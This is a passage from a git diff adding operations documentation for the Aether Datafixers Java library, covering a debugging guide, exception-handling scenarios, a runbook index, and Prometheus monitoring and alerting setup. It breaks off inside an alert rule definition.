approach to diagnosing migration issues in Aether Datafixers. + +## Quick Reference + +| Need | Tool | Configuration | +|--------------------|---------------------|----------------------------| +| Basic logs | SLF4J | Set level to DEBUG | +| Detailed trace | `DiagnosticContext` | Enable with options | +| Per-fix snapshots | `DiagnosticOptions` | `captureSnapshots(true)` | +| Rule-level detail | `DiagnosticOptions` | `captureRuleDetails(true)` | +| Production minimal | `DiagnosticOptions` | `minimal()` preset | + +--- + +## SLF4J Configuration + +### Default Logger Name + +The default logger name for Aether Datafixers is: + +``` +de.splatgames.aether.datafixers +``` + +### Using Slf4jDataFixerContext + +Route datafixer logs through your application's logging framework: + +```java +import de.splatgames.aether.datafixers.core.fix.Slf4jDataFixerContext; + +// Option 1: Default logger name +DataFixerContext context = new Slf4jDataFixerContext(); + +// Option 2: Custom logger name +DataFixerContext context = new Slf4jDataFixerContext("com.myapp.migrations"); + +// Option 3: Existing logger +Logger logger = LoggerFactory.getLogger(MyMigrationService.class); +DataFixerContext context = new Slf4jDataFixerContext(logger); + +// Use in migration +fixer.update(typeRef, data, fromVersion, toVersion, context); +``` + +### Logback Configuration + +```xml + + + + + + %d{HH:mm:ss.SSS} [%thread] %-5level %logger{36} - %msg%n + + + + + + logs/migrations.log + + logs/migrations.%d{yyyy-MM-dd}.log + 30 + + + %d{ISO8601} [%thread] %-5level %logger{36} - %msg%n%ex{full} + + + + + + + + + + + + + + + + +``` + +### Log4j2 Configuration + +```xml + + + + + + + + + + + + + + + + + + + + + + + + + + + +``` + +### Production vs Development Settings + +| Environment | Logger Level | Snapshots | Rule Details | +|-------------|--------------|-----------|--------------| +| Development | DEBUG | Yes | Yes | +| Staging | INFO | Yes | No | +| Production | WARN | No | No | + +--- + +## MigrationReport Diagnostics + +### Enabling Diagnostics + +```java +import de.splatgames.aether.datafixers.api.diagnostic.DiagnosticContext; +import de.splatgames.aether.datafixers.api.diagnostic.DiagnosticOptions; +import de.splatgames.aether.datafixers.api.diagnostic.MigrationReport; + +// Full diagnostics for debugging +DiagnosticContext context = DiagnosticContext.create( + 
DiagnosticOptions.builder() + .captureSnapshots(true) + .captureRuleDetails(true) + .prettyPrintSnapshots(true) + .build() +); + +// Run migration +Dynamic result = fixer.update(typeRef, data, fromVersion, toVersion, context); + +// Get the report +MigrationReport report = context.getReport(); +``` + +### Report Fields Reference + +| Field | Method | Description | When to Use | +|-----------------|--------------------------|-------------------------|-----------------------| +| Type | `type()` | TypeReference migrated | Always | +| From Version | `fromVersion()` | Source version | Always | +| To Version | `toVersion()` | Target version | Always | +| Duration | `totalDuration()` | Total migration time | Performance issues | +| Fix Count | `fixCount()` | Number of fixes applied | Verify migration path | +| Fix Executions | `fixExecutions()` | Detailed fix list | Tracing issues | +| Rule Count | `ruleApplicationCount()` | Total rules evaluated | Deep debugging | +| Touched Types | `touchedTypes()` | All types processed | Complex migrations | +| Warnings | `warnings()` | Non-fatal issues | Data quality | +| Input Snapshot | `inputSnapshot()` | Data before migration | Transform debugging | +| Output Snapshot | `outputSnapshot()` | Data after migration | Transform debugging | + +### Reading the Report + +```java +MigrationReport report = context.getReport(); + +// Basic summary +System.out.println(report.toSummary()); +// Output: "Migration of 'player' from v100 to v200: 150ms, 5 fixes" + +// Detailed analysis +System.out.println("Type: " + report.type().getId()); +System.out.println("Version: " + report.fromVersion().getVersion() + + " -> " + report.toVersion().getVersion()); +System.out.println("Duration: " + report.totalDuration().toMillis() + "ms"); +System.out.println("Fixes Applied: " + report.fixCount()); +System.out.println("Rules Evaluated: " + report.ruleApplicationCount()); + +// Check for warnings +if (report.hasWarnings()) { + System.out.println("Warnings:"); + for (String warning : report.warnings()) { + System.out.println(" - " + warning); + } +} + +// Snapshots (if enabled) +report.inputSnapshot().ifPresent(snap -> + System.out.println("Input:\n" + snap)); +report.outputSnapshot().ifPresent(snap -> + System.out.println("Output:\n" + snap)); +``` + +--- + +## Tracing Fix Order + +### Understanding Fix Application + +Fixes are applied in version order, from `fromVersion` to `toVersion`. Each fix transforms data from one version to the next. 
+ +``` +v100 ──[Fix A]──> v110 ──[Fix B]──> v150 ──[Fix C]──> v200 +``` + +### Listing Applied Fixes + +```java +MigrationReport report = context.getReport(); + +System.out.println("Applied fixes in order:"); +for (FixExecution fix : report.fixExecutions()) { + System.out.println(fix.toSummary()); + // Output: "rename_field (v100 -> v110): 5ms, 3 rules (2 matched)" +} +``` + +### Detailed Fix Analysis + +```java +for (FixExecution fix : report.fixExecutions()) { + System.out.println("\nFix: " + fix.fixName()); + System.out.println(" Version: " + fix.fromVersion().getVersion() + + " -> " + fix.toVersion().getVersion()); + System.out.println(" Duration: " + fix.durationMillis() + "ms"); + System.out.println(" Rules: " + fix.ruleCount() + + " (" + fix.matchedRuleCount() + " matched)"); + + // Per-fix snapshots + fix.beforeSnapshotOpt().ifPresent(snap -> + System.out.println(" Before: " + snap)); + fix.afterSnapshotOpt().ifPresent(snap -> + System.out.println(" After: " + snap)); + + // Rule-level details (if captureRuleDetails enabled) + for (RuleApplication rule : fix.ruleApplications()) { + System.out.println(" Rule: " + rule.ruleName() + + " on " + rule.typeName() + + " -> " + (rule.matched() ? "MATCHED" : "skipped") + + " (" + rule.durationMillis() + "ms)"); + } +} +``` + +### Finding a Specific Fix + +```java +// Find by name +Optional fix = report.fixExecutions().stream() + .filter(f -> f.fixName().equals("rename_player_field")) + .findFirst(); + +// Find by version +Optional fixAtVersion = report.fixExecutions().stream() + .filter(f -> f.fromVersion().getVersion() == 150) + .findFirst(); +``` + +--- + +## DiagnosticOptions + +### Available Presets + +| Preset | Snapshots | Rule Details | Pretty Print | Use Case | +|--------------|-----------|--------------|--------------|-----------------------| +| `defaults()` | Yes | Yes | Yes | Development debugging | +| `minimal()` | No | No | No | Production monitoring | + +```java +// Full diagnostics (development) +DiagnosticContext devContext = DiagnosticContext.create(DiagnosticOptions.defaults()); + +// Minimal overhead (production) +DiagnosticContext prodContext = DiagnosticContext.create(DiagnosticOptions.minimal()); + +// No diagnostics (maximum performance) +fixer.update(typeRef, data, fromVersion, toVersion); // No context +``` + +### Custom Configuration + +```java +DiagnosticOptions options = DiagnosticOptions.builder() + .captureSnapshots(true) // Enable before/after snapshots + .captureRuleDetails(true) // Enable per-rule tracking + .maxSnapshotLength(10000) // Truncate large snapshots (0 = unlimited) + .prettyPrintSnapshots(true) // Format JSON for readability + .build(); +``` + +### Snapshot Truncation + +Large data structures are truncated to prevent memory issues: + +```java +DiagnosticOptions options = DiagnosticOptions.builder() + .captureSnapshots(true) + .maxSnapshotLength(500) // Truncate to 500 characters + .build(); + +// Truncated snapshots end with "... (truncated)" +``` + +--- + +## Step-by-Step Debugging Workflow + +### 1. Reproduce the Issue + +```java +// Isolate a single problematic record +Dynamic problematicData = loadProblemRecord(); +DataVersion fromVersion = new DataVersion(100); +DataVersion toVersion = new DataVersion(200); +``` + +### 2. Enable Full Diagnostics + +```java +DiagnosticContext context = DiagnosticContext.create( + DiagnosticOptions.builder() + .captureSnapshots(true) + .captureRuleDetails(true) + .prettyPrintSnapshots(true) + .build() +); +``` + +### 3. 
Run Migration with Diagnostics + +```java +try { + Dynamic result = fixer.update(typeRef, problematicData, fromVersion, toVersion, context); + System.out.println("Migration succeeded"); +} catch (DataFixerException e) { + System.err.println("Migration failed: " + e.getMessage()); +} finally { + // Always get the report (even on failure) + MigrationReport report = context.getReport(); + analyzeReport(report); +} +``` + +### 4. Analyze the Report + +```java +private void analyzeReport(MigrationReport report) { + System.out.println("\n=== Migration Report ==="); + System.out.println(report.toSummary()); + + // Check warnings + if (report.hasWarnings()) { + System.out.println("\nWarnings:"); + report.warnings().forEach(w -> System.out.println(" - " + w)); + } + + // Find slow fixes + System.out.println("\nFix timing:"); + report.fixExecutions().stream() + .sorted((a, b) -> Long.compare(b.durationMillis(), a.durationMillis())) + .forEach(fix -> System.out.println(" " + fix.fixName() + ": " + fix.durationMillis() + "ms")); + + // Check for unmatched rules + long unmatchedRules = report.fixExecutions().stream() + .flatMap(fix -> fix.ruleApplications().stream()) + .filter(rule -> !rule.matched()) + .count(); + System.out.println("\nUnmatched rules: " + unmatchedRules); +} +``` + +### 5. Examine Snapshots + +```java +// Compare before/after for the failing fix +for (FixExecution fix : report.fixExecutions()) { + System.out.println("\n--- " + fix.fixName() + " ---"); + + fix.beforeSnapshotOpt().ifPresent(before -> { + System.out.println("BEFORE:"); + System.out.println(before); + }); + + fix.afterSnapshotOpt().ifPresent(after -> { + System.out.println("AFTER:"); + System.out.println(after); + }); +} +``` + +--- + +## Spring Boot Integration + +### Diagnostics via MigrationService + +```java +@Autowired +private MigrationService migrationService; + +public void migrateWithDiagnostics(TaggedDynamic data) { + DiagnosticContext context = DiagnosticContext.create(DiagnosticOptions.defaults()); + + MigrationResult result = migrationService + .migrate(data) + .from(100) + .to(200) + .withContext(context) + .execute(); + + // Analyze diagnostics + MigrationReport report = context.getReport(); + logReport(report); +} + +private void logReport(MigrationReport report) { + logger.info("Migration: {}", report.toSummary()); + + for (String warning : report.warnings()) { + logger.warn(" Warning: {}", warning); + } + + for (FixExecution fix : report.fixExecutions()) { + logger.debug(" Fix '{}': {}ms, {} rules ({} matched)", + fix.fixName(), + fix.durationMillis(), + fix.ruleCount(), + fix.matchedRuleCount()); + } +} +``` + +### Conditional Diagnostics in Production + +```java +@Value("${aether.datafixers.diagnostics.enabled:false}") +private boolean diagnosticsEnabled; + +public MigrationResult migrate(TaggedDynamic data) { + MigrationService.MigrationBuilder builder = migrationService + .migrate(data) + .from(100) + .to(200); + + if (diagnosticsEnabled) { + DiagnosticContext context = DiagnosticContext.create(DiagnosticOptions.minimal()); + builder.withContext(context); + } + + return builder.execute(); +} +``` + +--- + +## Common Debugging Scenarios + +### Scenario: Migration Produces Wrong Output + +1. Enable snapshots +2. Compare `inputSnapshot` with `outputSnapshot` +3. Check each fix's before/after snapshots +4. Identify which fix introduced the problem + +### Scenario: Migration is Slow + +1. Enable `DiagnosticOptions.minimal()` (low overhead) +2. Check `report.totalDuration()` +3. Sort fixes by duration +4. 
Profile the slowest fix + +```java +report.fixExecutions().stream() + .sorted((a, b) -> Long.compare(b.durationMillis(), a.durationMillis())) + .limit(5) + .forEach(fix -> System.out.println(fix.fixName() + ": " + fix.durationMillis() + "ms")); +``` + +### Scenario: Warning During Migration + +1. Check `report.warnings()` +2. Enable rule details to see which rule emitted the warning +3. Review the fix implementation for `context.warn()` calls + +--- + +## Related + +- [Error Scenarios](error-scenarios.md) — Exception handling reference +- [How to Use Diagnostics](../how-to/use-diagnostics.md) — Full API reference +- [How to Debug Migrations](../how-to/debug-migrations.md) — Basic debugging tips +- [Monitoring & Alerting](monitoring-alerting.md) — Production monitoring diff --git a/docs/operations/error-scenarios.md b/docs/operations/error-scenarios.md new file mode 100644 index 0000000..2613a62 --- /dev/null +++ b/docs/operations/error-scenarios.md @@ -0,0 +1,459 @@ +# Error Scenarios + +Detailed guide to handling exceptions in Aether Datafixers production environments. + +## Exception Hierarchy Quick Reference + +| Exception | Context Fields | Common Causes | +|----------------------|--------------------------------------------------------|---------------------------| +| `DataFixerException` | `context` | Base class for all errors | +| `FixException` | `fixName`, `fromVersion`, `toVersion`, `typeReference` | Fix logic failure | +| `DecodeException` | `typeReference`, `path` | Invalid input data | +| `EncodeException` | `typeReference`, `failedValue` | Serialization failure | +| `RegistryException` | `missingType`, `missingVersion` | Missing registration | + +All exceptions extend `RuntimeException` (unchecked) and are immutable/thread-safe. + +--- + +## FixException + +Thrown when a DataFix fails to transform data from one version to another. + +### Context Fields + +| Field | Accessor | Description | +|-----------------|----------------------|-----------------------------| +| `fixName` | `getFixName()` | Name of the fix that failed | +| `fromVersion` | `getFromVersion()` | Source version of migration | +| `toVersion` | `getToVersion()` | Target version of migration | +| `typeReference` | `getTypeReference()` | Type being transformed | + +### Context String Format + +``` +fix=rename_player_name, version=100->200, type=player +``` + +### Common Causes + +1. **Invalid input data** — Data doesn't match expected schema +2. **Missing required field** — Fix expects a field that doesn't exist +3. **Type mismatch** — Expected string but found number +4. **Rule application failure** — TypeRewriteRule failed to apply +5. **Null pointer** — Fix logic encountered null unexpectedly + +### Resolution Steps + +```java +try { + Dynamic result = fixer.update(typeRef, data, fromVersion, toVersion); +} catch (FixException e) { + // 1. Log with full context + logger.error("Migration failed: {} [{}]", e.getMessage(), e.getContext()); + + // 2. Extract specific fields for analysis + if (e.getFixName() != null) { + logger.error(" Fix: {}", e.getFixName()); + } + if (e.getFromVersion() != null && e.getToVersion() != null) { + logger.error(" Version: {} -> {}", + e.getFromVersion().getVersion(), + e.getToVersion().getVersion()); + } + if (e.getTypeReference() != null) { + logger.error(" Type: {}", e.getTypeReference().getId()); + } + + // 3. 
Check root cause + if (e.getCause() != null) { + logger.error(" Root cause: {}", e.getCause().getMessage()); + } +} +``` + +### Diagnostic Integration + +```java +// Use DiagnosticContext to capture snapshots +DiagnosticContext ctx = DiagnosticContext.create( + DiagnosticOptions.builder() + .captureSnapshots(true) + .build() +); + +try { + fixer.update(typeRef, data, fromVersion, toVersion, ctx); +} catch (FixException e) { + MigrationReport report = ctx.getReport(); + + // Find which fix ran last (the one that failed) + List fixes = report.fixExecutions(); + if (!fixes.isEmpty()) { + FixExecution lastFix = fixes.get(fixes.size() - 1); + logger.error("Last fix before failure: {}", lastFix.fixName()); + lastFix.beforeSnapshotOpt().ifPresent(snap -> + logger.error("Data before fix: {}", snap)); + } +} +``` + +--- + +## DecodeException + +Thrown when deserialization from Dynamic to typed Java object fails. + +### Context Fields + +| Field | Accessor | Description | +|-----------------|----------------------|-------------------------------------------| +| `typeReference` | `getTypeReference()` | Type being decoded | +| `path` | `getPath()` | Location in data structure (dot notation) | + +### Context String Format + +``` +type=player, path=inventory[0].item.name +``` + +### Path Notation + +The path uses dot notation with array indices: +- `player.name` — Field `name` in object `player` +- `inventory[0]` — First element of array `inventory` +- `inventory[0].item.damage` — Nested field access + +### Common Causes + +1. **Missing required field** — Schema expects field that doesn't exist +2. **Invalid field type** — Expected number, got string +3. **Malformed data** — Corrupt or truncated input +4. **Schema mismatch** — Data version doesn't match expected schema +5. **Null value** — Non-nullable field is null + +### Resolution Steps + +```java +try { + Typed typed = fixer.decode(version, typeRef, dynamic); +} catch (DecodeException e) { + logger.error("Decode failed: {} [{}]", e.getMessage(), e.getContext()); + + // Path tells you exactly where the problem is + if (e.getPath() != null) { + logger.error("Problem location: {}", e.getPath()); + + // Navigate to the problematic field + String[] pathParts = e.getPath().split("\\."); + Dynamic current = dynamic; + for (String part : pathParts) { + if (part.contains("[")) { + // Array access + String fieldName = part.substring(0, part.indexOf('[')); + int index = Integer.parseInt( + part.substring(part.indexOf('[') + 1, part.indexOf(']'))); + current = current.get(fieldName).get(index); + } else { + current = current.get(part); + } + logger.debug(" {} = {}", part, current.getValue()); + } + } +} +``` + +### Data Inspection + +```java +// Inspect the raw data at the failing path +DecodeException e = ...; +if (e.getPath() != null && e.getPath().contains(".")) { + String parentPath = e.getPath().substring(0, e.getPath().lastIndexOf('.')); + String fieldName = e.getPath().substring(e.getPath().lastIndexOf('.') + 1); + + logger.error("Parent object fields at '{}': {}", parentPath, + navigateTo(dynamic, parentPath).asMap().keySet()); +} +``` + +--- + +## EncodeException + +Thrown when serialization from Java object to Dynamic representation fails. 
+ +### Context Fields + +| Field | Accessor | Description | +|-----------------|----------------------|-----------------------------| +| `typeReference` | `getTypeReference()` | Type being encoded | +| `failedValue` | `getFailedValue()` | Value that failed to encode | + +### Context String Format + +``` +type=player +``` + +### Common Causes + +1. **Null value** — Required field is null +2. **Unsupported type** — Codec doesn't support the value type +3. **Codec misconfiguration** — Encoder not properly set up +4. **Circular reference** — Object graph contains cycles + +### Resolution Steps + +```java +try { + Dynamic encoded = fixer.encode(version, typeRef, value, ops); +} catch (EncodeException e) { + logger.error("Encode failed: {} [{}]", e.getMessage(), e.getContext()); + + // Inspect the failed value (be careful with sensitive data) + if (e.getFailedValue() != null) { + logger.error("Failed value class: {}", e.getFailedValue().getClass().getName()); + // Only log non-sensitive values + if (isSafeToLog(e.getFailedValue())) { + logger.error("Failed value: {}", e.getFailedValue()); + } + } + + // Check if it's a null issue + if (e.getCause() instanceof NullPointerException) { + logger.error("Null value encountered - check required fields"); + } +} +``` + +### Sensitive Data Warning + +The `failedValue` may contain sensitive information (passwords, tokens, PII). Always sanitize before logging: + +```java +private boolean isSafeToLog(Object value) { + // Don't log objects that might contain sensitive data + if (value instanceof String) { + String str = (String) value; + return str.length() < 100 && !str.toLowerCase().contains("password"); + } + return value instanceof Number || value instanceof Boolean; +} +``` + +--- + +## RegistryException + +Thrown when a registry lookup fails (type, schema, or codec not found). + +### Context Fields + +| Field | Accessor | Description | +|------------------|-----------------------|-------------------------| +| `missingType` | `getMissingType()` | TypeReference not found | +| `missingVersion` | `getMissingVersion()` | DataVersion not found | + +### Context String Format + +``` +type=custom_entity, version=150 +``` + +### Common Causes + +1. **Type not registered** — Forgot to register type in bootstrap +2. **Schema not registered** — Version not registered in SchemaRegistry +3. **Version gap** — No schema exists for intermediate version +4. 
**Typo in TypeReference** — Type ID doesn't match registration + +### Resolution Steps + +```java +try { + Schema schema = schemaRegistry.require(version); +} catch (RegistryException e) { + logger.error("Registry lookup failed: {} [{}]", e.getMessage(), e.getContext()); + + if (e.getMissingVersion() != null) { + logger.error("Missing schema for version: {}", + e.getMissingVersion().getVersion()); + + // List available versions + logger.info("Available versions: {}", + schemaRegistry.getVersions().stream() + .map(v -> String.valueOf(v.getVersion())) + .collect(Collectors.joining(", "))); + } + + if (e.getMissingType() != null) { + logger.error("Missing type: {}", e.getMissingType().getId()); + + // List registered types (at current version if available) + logger.info("Registered types: {}", + typeRegistry.getRegisteredTypes().stream() + .map(TypeReference::getId) + .collect(Collectors.joining(", "))); + } +} +``` + +### Bootstrap Verification Checklist + +When encountering RegistryException: + +- [ ] Check `registerSchemas()` includes the required version +- [ ] Check type is registered in the schema for that version +- [ ] Verify no gaps in version chain (e.g., 100 -> 200 needs fixes, not just schemas) +- [ ] Check for typos in TypeReference IDs +- [ ] Verify bootstrap is loaded (not null) + +--- + +## Schema Mismatch Scenarios + +### Data Version Doesn't Match Expected + +**Symptom**: Migration produces unexpected results or fails silently. + +**Detection**: + +```java +// Check data version before migration +Optional dataVersion = dynamic.get("_version").asNumber() + .map(Number::intValue); + +if (dataVersion.isEmpty()) { + logger.warn("Data has no version field - assuming oldest version"); +} + +int fromVersion = dataVersion.orElse(OLDEST_VERSION); +if (fromVersion > currentVersion.getVersion()) { + throw new IllegalStateException( + "Data version " + fromVersion + " is newer than current " + currentVersion); +} +``` + +### Type Structure Changed Without Fix + +**Symptom**: Fields missing or have wrong type after migration. + +**Detection**: + +```java +// Use SchemaValidator to detect coverage gaps +ValidationResult result = SchemaValidator.forBootstrap(bootstrap) + .validateFixCoverage() + .validate(); + +if (!result.isValid()) { + for (String error : result.getErrors()) { + logger.error("Schema validation error: {}", error); + } +} +``` + +**Resolution**: Write a DataFix to handle the schema change. 
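+
+As an illustration, here is a minimal, hypothetical sketch of the core rule such a fix might
+install, reusing the `Rules` helpers and `GsonOps.INSTANCE` shown in the migration guide (the
+surrounding `DataFix` registration boilerplate is omitted and depends on your bootstrap setup):
+
+```java
+// Hypothetical sketch: the "player" type renamed "name" to "username" between versions.
+// The DynamicOps argument is required so Rules.everywhere actually traverses children.
+TypeRewriteRule rule = Rules.everywhere(GsonOps.INSTANCE,
+        Rules.renameField("player", "name", "username"));
+```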
+ +--- + +## Extracting Exception Context + +### Complete Context Extraction + +```java +public class ExceptionAnalyzer { + + public static void logException(DataFixerException e) { + StringBuilder sb = new StringBuilder(); + sb.append("Exception: ").append(e.getClass().getSimpleName()).append("\n"); + sb.append("Message: ").append(e.getMessage()).append("\n"); + + if (e.getContext() != null) { + sb.append("Context: ").append(e.getContext()).append("\n"); + } + + // Type-specific extraction + if (e instanceof FixException fix) { + if (fix.getFixName() != null) { + sb.append("Fix Name: ").append(fix.getFixName()).append("\n"); + } + if (fix.getFromVersion() != null) { + sb.append("From Version: ").append(fix.getFromVersion().getVersion()).append("\n"); + } + if (fix.getToVersion() != null) { + sb.append("To Version: ").append(fix.getToVersion().getVersion()).append("\n"); + } + if (fix.getTypeReference() != null) { + sb.append("Type: ").append(fix.getTypeReference().getId()).append("\n"); + } + } else if (e instanceof DecodeException decode) { + if (decode.getTypeReference() != null) { + sb.append("Type: ").append(decode.getTypeReference().getId()).append("\n"); + } + if (decode.getPath() != null) { + sb.append("Path: ").append(decode.getPath()).append("\n"); + } + } else if (e instanceof EncodeException encode) { + if (encode.getTypeReference() != null) { + sb.append("Type: ").append(encode.getTypeReference().getId()).append("\n"); + } + // Be careful with failedValue - may contain sensitive data + } else if (e instanceof RegistryException registry) { + if (registry.getMissingType() != null) { + sb.append("Missing Type: ").append(registry.getMissingType().getId()).append("\n"); + } + if (registry.getMissingVersion() != null) { + sb.append("Missing Version: ").append(registry.getMissingVersion().getVersion()).append("\n"); + } + } + + // Root cause chain + Throwable cause = e.getCause(); + int depth = 0; + while (cause != null && depth < 5) { + sb.append("Caused by: ").append(cause.getClass().getSimpleName()) + .append(": ").append(cause.getMessage()).append("\n"); + cause = cause.getCause(); + depth++; + } + + System.err.println(sb); + } +} +``` + +### Logging Pattern for Production + +```xml + +%d{ISO8601} [%thread] %-5level %logger{36} - %msg%n%ex{full} +``` + +```java +// Structured logging with MDC +import org.slf4j.MDC; + +try { + fixer.update(typeRef, data, fromVersion, toVersion); +} catch (FixException e) { + MDC.put("fix_name", e.getFixName()); + MDC.put("from_version", String.valueOf(e.getFromVersion())); + MDC.put("to_version", String.valueOf(e.getToVersion())); + MDC.put("type", e.getTypeReference() != null ? e.getTypeReference().getId() : "unknown"); + + logger.error("Migration failed", e); + + MDC.clear(); +} +``` + +--- + +## Related + +- [Debugging Guide](debugging-guide.md) — Systematic debugging approach +- [Recovery Procedures](recovery-procedures.md) — How to recover from failures +- [Common Errors](../troubleshooting/common-errors.md) — Quick error reference +- [How to Use Diagnostics](../how-to/use-diagnostics.md) — Diagnostic API reference diff --git a/docs/operations/index.md b/docs/operations/index.md new file mode 100644 index 0000000..9de9d5e --- /dev/null +++ b/docs/operations/index.md @@ -0,0 +1,128 @@ +# Operations Runbook + +Operational guidance for running Aether Datafixers in production environments. This runbook covers error handling, debugging, monitoring, and recovery procedures. 
+ +## Quick Reference + +| Scenario | Document | Key Actions | +|--------------------------------|-------------------------------------------------|---------------------------------------| +| Migration fails with exception | [Error Scenarios](error-scenarios.md) | Extract context, check exception type | +| Need detailed migration trace | [Debugging Guide](debugging-guide.md) | Enable `DiagnosticContext` | +| Set up production monitoring | [Monitoring & Alerting](monitoring-alerting.md) | Configure Micrometer metrics | +| Partial migration / data loss | [Recovery Procedures](recovery-procedures.md) | Restore from backup, retry | + +## Documentation Structure + +### [Error Scenarios](error-scenarios.md) + +Exception handling reference for production troubleshooting: +- Exception hierarchy and context fields +- `FixException` — Migration logic failures +- `DecodeException` — Deserialization failures +- `EncodeException` — Serialization failures +- `RegistryException` — Missing type or version +- Schema mismatch detection and resolution + +### [Debugging Guide](debugging-guide.md) + +Systematic approach to diagnosing migration issues: +- SLF4J configuration (Logback, Log4j2) +- Using `MigrationReport` for diagnostics +- Tracing fix application order +- Step-by-step debugging workflow + +### [Monitoring & Alerting](monitoring-alerting.md) + +Production monitoring setup: +- Micrometer metrics reference +- Recommended alert thresholds +- Prometheus alerting rules +- Grafana dashboard templates +- Actuator health integration + +### [Recovery Procedures](recovery-procedures.md) + +Handling failures and data recovery: +- Backup recommendations +- Partial migration recovery +- Rollback strategies +- Incident response workflows + +--- + +## Emergency Response + +### Migration Completely Failed + +1. **Check metrics** — Look at `aether.datafixers.migrations.failure` counter +2. **Extract context** — See [Error Scenarios](error-scenarios.md#extracting-exception-context) +3. **Enable DEBUG** — Set log level for `de.splatgames.aether.datafixers` +4. **Capture diagnostics** — Use `DiagnosticContext` on a sample record +5. **Restore if needed** — See [Recovery Procedures](recovery-procedures.md) + +### High Failure Rate Alert + +1. **Check error breakdown** — Query failures by `error_type` tag +2. **Identify pattern** — Same exception? Same data version? +3. **Isolate bad records** — Query for records at problematic version +4. **Apply targeted fix** — Fix data or code, retry migration + +### Slow Migration Alert + +1. **Check version span** — Large version jumps take longer +2. **Profile fixes** — Use `MigrationReport.fixExecutions()` timing +3. **Check data size** — Large objects slow down processing +4. 
**Consider batching** — Process in smaller batches + +--- + +## Health Checks + +### Actuator Endpoints + +| Endpoint | Purpose | +|------------------------|---------------------------| +| `/actuator/health` | UP/DOWN status per domain | +| `/actuator/info` | Version information | +| `/actuator/datafixers` | Detailed domain status | +| `/actuator/prometheus` | Metrics export | + +### Kubernetes Probes + +```yaml +livenessProbe: + httpGet: + path: /actuator/health/liveness + port: 8080 + initialDelaySeconds: 30 + periodSeconds: 10 + +readinessProbe: + httpGet: + path: /actuator/health/readiness + port: 8080 + initialDelaySeconds: 10 + periodSeconds: 5 +``` + +--- + +## Key Metrics Overview + +| Metric | Type | Alert Threshold | +|---------------------------------------------|--------------|-----------------| +| `aether.datafixers.migrations.success` | Counter | — | +| `aether.datafixers.migrations.failure` | Counter | > 0 per minute | +| `aether.datafixers.migrations.duration` | Timer | p99 > 1s | +| `aether.datafixers.migrations.version.span` | Distribution | avg > 50 | + +See [Monitoring & Alerting](monitoring-alerting.md) for complete metrics reference. + +--- + +## Related + +- [Troubleshooting](../troubleshooting/index.md) — Basic troubleshooting tips +- [Spring Boot Metrics](../spring-boot/metrics.md) — Detailed metrics reference +- [Spring Boot Actuator](../spring-boot/actuator.md) — Actuator integration +- [How to Use Diagnostics](../how-to/use-diagnostics.md) — Diagnostic API reference diff --git a/docs/operations/monitoring-alerting.md b/docs/operations/monitoring-alerting.md new file mode 100644 index 0000000..2c0b9ae --- /dev/null +++ b/docs/operations/monitoring-alerting.md @@ -0,0 +1,646 @@ +# Monitoring & Alerting + +Production monitoring setup for Aether Datafixers using Micrometer, Prometheus, and Grafana. + +## Metric Quick Reference + +| Metric | Type | Tags | Alert Threshold | Description | +|---------------------------------------------|--------------|------------------------|-----------------|-----------------------| +| `aether.datafixers.migrations.success` | Counter | `domain` | — | Successful migrations | +| `aether.datafixers.migrations.failure` | Counter | `domain`, `error_type` | > 0/min | Failed migrations | +| `aether.datafixers.migrations.duration` | Timer | `domain` | p99 > 1s | Execution time | +| `aether.datafixers.migrations.version.span` | Distribution | `domain` | avg > 50 | Version distance | + +All metrics use the prefix `aether.datafixers.migrations`. + +--- + +## Metric Details + +### Success Counter + +Tracks total successful migrations per domain. + +**Prometheus format:** +``` +aether_datafixers_migrations_success_total{domain="game"} 1234 +``` + +**Use cases:** +- Calculate success rate +- Monitor throughput +- Track migration activity + +### Failure Counter + +Tracks failed migrations with error type breakdown. + +**Prometheus format:** +``` +aether_datafixers_migrations_failure_total{domain="game",error_type="FixException"} 5 +aether_datafixers_migrations_failure_total{domain="game",error_type="DecodeException"} 2 +``` + +**Tags:** +- `domain` — DataFixer domain name +- `error_type` — Exception class simple name + +### Duration Timer + +Tracks execution time distribution (includes both success and failure). 
+ +**Prometheus format:** +``` +aether_datafixers_migrations_duration_seconds_count{domain="game"} 1239 +aether_datafixers_migrations_duration_seconds_sum{domain="game"} 185.7 +aether_datafixers_migrations_duration_seconds_bucket{domain="game",le="0.01"} 500 +aether_datafixers_migrations_duration_seconds_bucket{domain="game",le="0.1"} 1100 +aether_datafixers_migrations_duration_seconds_bucket{domain="game",le="1.0"} 1230 +aether_datafixers_migrations_duration_seconds_bucket{domain="game",le="+Inf"} 1239 +``` + +### Version Span Distribution + +Tracks the distance between source and target versions (indicates data age). + +**Prometheus format:** +``` +aether_datafixers_migrations_version_span_count{domain="game"} 1234 +aether_datafixers_migrations_version_span_sum{domain="game"} 45600 +aether_datafixers_migrations_version_span_max{domain="game"} 150 +``` + +--- + +## Recommended Alert Thresholds + +### Critical Alerts (Page On-Call) + +| Alert | Condition | Duration | Action | +|------------------------|---------------------|----------|-------------------------| +| High Failure Rate | > 5% failures | 5m | Immediate investigation | +| All Migrations Failing | 100% failure rate | 2m | Emergency response | +| Service Down | No metrics reported | 5m | Check service health | + +### Warning Alerts (Notify Team) + +| Alert | Condition | Duration | Action | +|-----------------------|---------------|----------|-----------------------------------| +| Elevated Failure Rate | > 1% failures | 5m | Investigate during business hours | +| Slow Migrations | p95 > 1s | 5m | Performance review | +| Very Slow Migrations | p99 > 5s | 5m | Profile and optimize | + +### Informational Alerts (Dashboard/Log) + +| Alert | Condition | Duration | Action | +|--------------------|----------------|----------|-----------------------------| +| Large Version Span | avg span > 50 | 1h | Review data freshness | +| Very Large Span | max span > 200 | 1h | Identify stale data sources | +| No Activity | 0 migrations | 1h | Verify expected behavior | + +--- + +## Prometheus Alert Rules + +### Complete Alert Configuration + +```yaml +groups: + - name: aether-datafixers-critical + rules: + # High failure rate - immediate attention + - alert: DataFixerHighFailureRate + expr: | + ( + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain) + / ( + sum(rate(aether_datafixers_migrations_success_total[5m])) by (domain) + + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain) + ) + ) > 0.05 + for: 5m + labels: + severity: critical + annotations: + summary: "Critical: DataFixer failure rate > 5% in domain {{ $labels.domain }}" + description: "Failure rate is {{ $value | humanizePercentage }}. Check error logs and metrics." + runbook_url: "https://docs.example.com/runbooks/datafixer-high-failure" + + # All migrations failing + - alert: DataFixerAllFailing + expr: | + sum(rate(aether_datafixers_migrations_success_total[2m])) by (domain) == 0 + and sum(rate(aether_datafixers_migrations_failure_total[2m])) by (domain) > 0 + for: 2m + labels: + severity: critical + annotations: + summary: "Critical: All migrations failing in domain {{ $labels.domain }}" + 